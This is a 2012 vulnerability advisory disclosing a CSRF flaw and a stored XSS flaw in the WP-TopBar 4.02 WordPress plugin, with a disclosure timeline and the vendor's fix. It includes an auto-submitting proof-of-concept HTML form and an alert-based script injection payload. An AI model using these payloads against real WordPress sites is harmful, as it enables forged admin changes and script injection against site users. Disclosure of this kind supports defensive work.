WordPress Wp-TopBar 4.02 CSRF / XSS

2012-09-20T00:00:00
ID PACKETSTORM:116716
Type packetstorm
Reporter Blake Entrekin
Modified 2012-09-20T00:00:00

Description

                                        
                                            `# Exploit Title: WP-TopBar 4.02 CSRF  
# Date: 2012-09-13  
# Author: Blake Entrekin  
# Version: 4.02  
# Download Link: http://downloads.wordpress.org/plugin/wp-topbar.4.02.zip  
# Vendor Link: http://wordpress.org/extend/plugins/wp-topbar/  
-------------------  
CSRF  
-------------------  
  
  
The wp-topbar.php does not utilize a nonce value when submitting any POST  
changes. As a result, this page is vulnerable to Cross Site Request  
Forgery.  
  
Proof of Concept Code:  
  
<html>  
<head>  
<title></title>  
</head>  
<body>  
<form name="testform" action="  
https://localhost/wordpress/wp-admin/admin.php?page=wp-topbar.php&action=topbartext&barid=1"  
method="POST">  
<br>  
<input type="hidden" name="wptbbartext"  
value="</script><script>onload=alert(3)</script>">  
<input type="hidden" name="wptblinktext" value="whatever">  
<input type="hidden" name="wptblinkurl"  
value="http%3A%2F%2Fwordpress.org%2Fextend%2Fplugins%2Fwp-topbar%2F">  
<input type="hidden" name="wptblinktarget" value="blank">  
<input type="hidden" name="wptbenableimage" value="false">  
<input type="hidden" name="wptbbarimage" value="">  
<input type="hidden" name="update_wptbSettings"  
value="Update+Settings">  
  
</form>  
<script type="text/javascript">  
document.testform.submit();  
</script>  
</body>  
</html>  
  
This script takes advantage of a logged in user to submit the required  
variables needed to update an existing TopBar with the required settings  
that commits and executes a Stored XSS vulnerability from a previous  
disclosure. In this example it was tested against a wordpress application  
running on �localhost� and altered a TopBar with the �id� of 1. This  
version of WP-TopBar creates a default TopBar with the id of 1 upon  
installation. Any subsequent TopBar created has an id incremented. It can  
be assumed that a user is more then likely to still have the default TopBar  
and easily attack it.  
  
# Vulnerability Timeline  
2012-09-04 � Vulnerability Reported  
2012-09-05 � Developer Acknowledges  
2012-09-10 � Developer Issues Fix (v4.03)  
2012-09-15 - Vulnerability Disclosed  
  
--   
Blake Entrekin  
Independent Security Consultant/  
Web Penetration Tester  
http://EntreSec.blogspot.com  
Twitter: @entresec <https://twitter.com/#%21/entresec>  
  
  
# Exploit Title: WP-TopBar 4.02 Authenticated Stored XSS  
# Date: 2012-09-13  
# Author: Blake Entrekin  
# Version: 4.02  
# Download Link: http://downloads.wordpress.org/plugin/wp-topbar.4.02.zip  
# Vendor Link: http://wordpress.org/extend/plugins/wp-topbar/  
-------------------  
Stored XSS  
-------------------  
  
The message field (wptbbartext variable) of the wp-topbar.php page is  
vulnerable to Stored Cross-site Scripting. This variable is only  
accessible via the admin menu of the plugin.  
  
The following code is an example:  
  
</script><script>alert(3)</script>  
  
This code is committed to the database upon submission and will run both  
under the admin interface when the bar is shown as a preview as well as the  
front facing page where the bar is set to display.  
  
# Vulnerability Timeline  
2012-09-04 � Vulnerability Reported  
2012-09-05 � Developer Acknowledges  
2012-09-10 � Developer Issues Fix (v4.03)  
2012-09-15 - Vulnerability Disclosed  
  
--   
Blake Entrekin  
Independent Security Consultant/  
Web Penetration Tester  
http://EntreSec.blogspot.com  
Twitter: @entresec <https://twitter.com/#%21/entresec>  
  
`